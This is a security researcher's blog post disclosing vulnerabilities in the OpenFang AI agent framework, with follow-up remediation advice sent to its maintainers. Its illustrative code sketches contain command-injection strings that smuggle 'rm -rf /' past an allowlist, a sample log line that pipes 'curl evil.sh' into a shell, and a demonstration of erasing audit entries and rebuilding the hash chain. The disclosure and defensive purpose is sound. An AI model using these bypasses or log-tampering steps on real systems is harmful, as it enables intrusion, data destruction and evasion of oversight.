Joel Eriksson
Vulnerability researcher, exploit developer and reverse-engineer. Have spoken at BlackHat, DefCon and the RSA conference. CTF player. Puzzle solver (Cicada 3301, Boxen)

Security in the Age of Agents

So many AI agent orchestration frameworks and “operating systems” being released right now claim to be built with security in mind – proudly listing their extensive security features, covering everything from their use of cryptography to sandboxes and memory-safe languages.

Then once you take a peek inside, the castle made of sand generally crumbles down fast.

Here we will take a look at one of them, a self-proclaimed Agent Operating System named OpenFang.

As is often the case, it sounds like security is a priority and that they’ve really thought about it from the ground up. It sounds quite promising, as long as you don’t bother to take a peek under the surface: 16 security systems, sandboxed execution, a Merkle audit trail, taint tracking and so on.

When taking a closer look, the “taint tracking” used to enforce an allowlist of commands for agents could be trivially bypassed in at least four different ways: while command-splitting on |, ;, && and || is caught, a whitelisted command followed by & cmd, `cmd`, $(cmd) or a newline followed by cmd works fine. Overall, they’re fighting a losing game by implementing a sandbox based on command-line parsing rather than using an actual sandbox (seccomp-bpf, for instance), a container or a microVM.
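To illustrate the class of bug, here’s a minimal sketch of that kind of parser-based allowlist check and why it fails. The function name, allowlist and split logic are my assumptions for illustration, not OpenFang’s actual code:

```python
# Hypothetical sketch of a parser-based command allowlist (names and split
# logic are my assumptions, not OpenFang's actual implementation).
ALLOWED = {"ls", "cat", "echo"}

def naive_is_allowed(cmdline: str) -> bool:
    # Split on the "obvious" separators, then check the first word of each part.
    parts = [cmdline]
    for sep in ("|", ";", "&&", "||"):
        parts = [p for chunk in parts for p in chunk.split(sep)]
    return all(p.split()[0] in ALLOWED for p in parts if p.strip())

# Caught: plain command-splitting on the checked separators.
assert not naive_is_allowed("ls; rm -rf /")

# Bypassed: metacharacters the parser never considers.
for bypass in ("ls & rm -rf /",      # single & as background-job separator
               "echo `rm -rf /`",    # backtick command substitution
               "echo $(rm -rf /)",   # $() command substitution
               "ls\nrm -rf /"):      # newline as a command separator
    assert naive_is_allowed(bypass)
```

Every bypass in the loop sails through, because the shell’s grammar is far richer than any blocklist of separators; that’s exactly why OS-level confinement beats string parsing here.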

As for the AES-256-GCM based auth in the OpenFang P2P protocol: besides being vulnerable to a replay attack, the protocol itself runs completely in plaintext after the handshake!
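The replay problem boils down to nothing fresh being bound into the authenticated message. Here’s a conceptual sketch (HMAC stands in for the AES-256-GCM tag; the message layout and names are mine, not the actual OFP wire format):

```python
# Conceptual replay sketch: HMAC stands in for the AEAD tag, and the message
# layout is my assumption, not the actual OFP protocol.
import hashlib
import hmac
import os

SHARED_KEY = os.urandom(32)

def make_auth_msg(payload: bytes) -> bytes:
    # Nothing fresh (server challenge, nonce, sequence number) is mixed in,
    # so the same bytes authenticate successfully forever.
    tag = hmac.new(SHARED_KEY, payload, hashlib.sha256).digest()
    return payload + tag

def server_accepts(msg: bytes) -> bool:
    payload, tag = msg[:-32], msg[-32:]
    expected = hmac.new(SHARED_KEY, payload, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)

captured = make_auth_msg(b"HELLO peer-id=alice")
assert server_accepts(captured)  # legitimate handshake
assert server_accepts(captured)  # attacker replays the captured bytes: accepted
```

Binding a server-chosen challenge (or a strictly increasing counter) into the authenticated data is what makes a captured message worthless the second time.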

Regarding the “WASM sandboxes”, it turns out they aren’t actually used for anything: there’s not a single WASM agent in the repo, and since they require implementing a completely custom API rather than conforming to WASI, it’s unlikely that anyone would bother making a WASM-based agent in the first place (not even the maintainers do).

And as for the “Merkle audit trail”, that audit trail is stored entirely in-memory, so simply restarting the daemon is enough to erase any traces of that trail.

Last but not least, it turns out that even their API key based authentication could be trivially bypassed, so anyone with access to the dashboard URL can get remote code execution. That’s the part I demonstrate in the video at the top, so enjoy. ;)

Note that I’m not against the idea of using AI agents. On the contrary, I think that it will become increasingly important for people to leverage the power of AI to accelerate themselves.

Being able to do so in a way that actually limits the risk and blast radius of any attack is a difficult problem though, which is why it’s one of the things I’m focusing heavily on right now…

To get notified when I start releasing some of the things I do within that space in the future, make sure to register at GRAFIT

UPDATE: The OpenFang team released an update within a few hours, and although it’s still not perfect they are definitely taking steps in the right direction.

UPDATE 2: After reviewing the fixes in the v0.3.30 release, I sent the maintainers the comments below:

It looks to me like you’re now unconditionally blocking metacharacters even for full mode, which means that even a full-mode agent will not be able to use pipes, shell redirections and so on, severely limiting its ability to do useful work. You should really look into a proper OS-level sandbox architecture instead of trying to enforce it at the command-parsing level.

As for the OFP wire protocol issues, messages are still sent in plaintext, so an attacker with the ability to MITM can still inject anything.

It also looks like the broadcast notification mechanism is broken (but it also seems unused!). In the release notes you mention that it requires a shared secret and uses authenticated writes, but you’re generating a nonce and deriving a session key from it without ever sharing the nonce, so peers will not be able to derive the correct session key.
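A minimal sketch of that failure mode, as I read the release (the derivation and function names are illustrative, not OpenFang’s actual code):

```python
# Sketch of the broken derivation: the sender derives a session key from
# (shared_secret, random nonce) but never transmits the nonce. Names are
# illustrative, not OpenFang's.
import hashlib
import hmac
import os

shared_secret = os.urandom(32)

def derive_key(secret: bytes, nonce: bytes) -> bytes:
    return hmac.new(secret, nonce, hashlib.sha256).digest()

# Sender side: fresh nonce, derived session key, but the nonce stays local.
sender_nonce = os.urandom(16)
sender_key = derive_key(shared_secret, sender_nonce)

# Receiver side: without the sender's nonce, any locally generated nonce
# yields a completely different key.
receiver_key = derive_key(shared_secret, os.urandom(16))
assert sender_key != receiver_key  # peers end up with mismatched session keys
```

Either the nonce has to go on the wire alongside the message, or (better) the already-established per-peer sessions should carry the notifications, as suggested below.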

You should use the connections you’ve already established to the peers in question to send the “broadcast” notifications as well, instead of establishing new connections for those.

You also have unnecessary unauthenticated fallback paths in the connection_loop in peer.rs, from read_message_authenticated -> read_message. The fallback paths seem unreachable in practice right now, but having them at all increases the risk of accidentally introducing a vulnerability later.

Regarding the audit trail, which you now persist in SQLite: the core remaining issue is that it doesn’t really do anything to stop an attacker from erasing their tracks once they have code execution. They can just delete rows from audit_entries and rebuild the chain. On top of that, you’re silently discarding errors, so if a database write fails for some reason the entry would only exist in memory and persistence is silently lost. At the very least, you should log a warning when this happens.
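The delete-and-rebuild attack is worth spelling out, since it’s the fundamental limitation of any hash chain whose root lives next to the data it protects. A sketch (the schema and column names are my assumptions, not OpenFang’s):

```python
# Sketch of why a locally rebuildable hash chain doesn't stop an attacker
# with code execution. Schema and column names are assumptions.
import hashlib
import sqlite3

def entry_hash(prev: str, msg: str) -> str:
    return hashlib.sha256((prev + msg).encode()).hexdigest()

def rebuild_chain(db):
    # Re-link every entry to its predecessor, starting from a fixed root.
    prev = "0" * 64
    for rowid, msg in db.execute("SELECT id, msg FROM audit_entries ORDER BY id").fetchall():
        prev = entry_hash(prev, msg)
        db.execute("UPDATE audit_entries SET hash=? WHERE id=?", (prev, rowid))

def verify_chain(db) -> bool:
    prev = "0" * 64
    for msg, h in db.execute("SELECT msg, hash FROM audit_entries ORDER BY id"):
        prev = entry_hash(prev, msg)
        if h != prev:
            return False
    return True

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE audit_entries (id INTEGER PRIMARY KEY, msg TEXT, hash TEXT)")
for msg in ("agent started", "ran: curl evil.sh | sh", "agent stopped"):
    db.execute("INSERT INTO audit_entries (msg) VALUES (?)", (msg,))
rebuild_chain(db)
assert verify_chain(db)

# Attacker with code execution erases their tracks and re-links the chain:
db.execute("DELETE FROM audit_entries WHERE msg LIKE '%evil%'")
rebuild_chain(db)
assert verify_chain(db)  # the tampered log still verifies
```

To make tampering detectable, the chain head has to be anchored somewhere the attacker can’t rewrite: a remote log collector, an append-only store, or periodically signed checkpoints.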

For the OFP wire protocol, look into the Noise Protocol Framework for how to implement something that is actually cryptographically sound. For the agent sandboxes, look into seccomp-bpf and/or Landlock on Linux, Seatbelt on macOS, AppContainers on Windows, and/or use containers and/or microVMs in general.

In general, having agents run commands in the same context and with the same privileges as the framework that is supposed to orchestrate them is a losing game if you actually want to keep things secure and have an audit trail that’s meaningful against an attacker.

Last and least, a tiny issue but still security hygiene 101: for the API key, you should hash the configured key on startup and hash the API keys you receive in external requests, then do a constant-time comparison of the hashes, rather than doing a constant-time comparison of the raw keys when they’re the same length and returning early when they’re not. The way you’re doing it now, an attacker could still use a timing attack to determine the API key length, in order to decide whether a bruteforce attack on it is worth pursuing. As a bonus, a memory leak / read primitive would also be a bit less harmful.
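The hash-then-compare pattern is a few lines. A sketch of the suggested fix (the key string is a placeholder):

```python
# Sketch of hash-then-compare API key checking: both sides are reduced to
# fixed-length digests before the constant-time comparison, so neither the
# key content nor its length leaks through timing.
import hashlib
import hmac

def key_digest(key: str) -> bytes:
    return hashlib.sha256(key.encode()).digest()

# Computed once at startup from the configured key (placeholder value here):
EXPECTED_DIGEST = key_digest("example-api-key")

def check_api_key(presented: str) -> bool:
    # Both digests are always 32 bytes, so there is no early length-mismatch
    # return for a timing attack to measure.
    return hmac.compare_digest(key_digest(presented), EXPECTED_DIGEST)

assert check_api_key("example-api-key")
assert not check_api_key("wrong")
```

As a side effect, the raw key no longer needs to sit in memory for the lifetime of the process, which is what softens the memory-disclosure scenario.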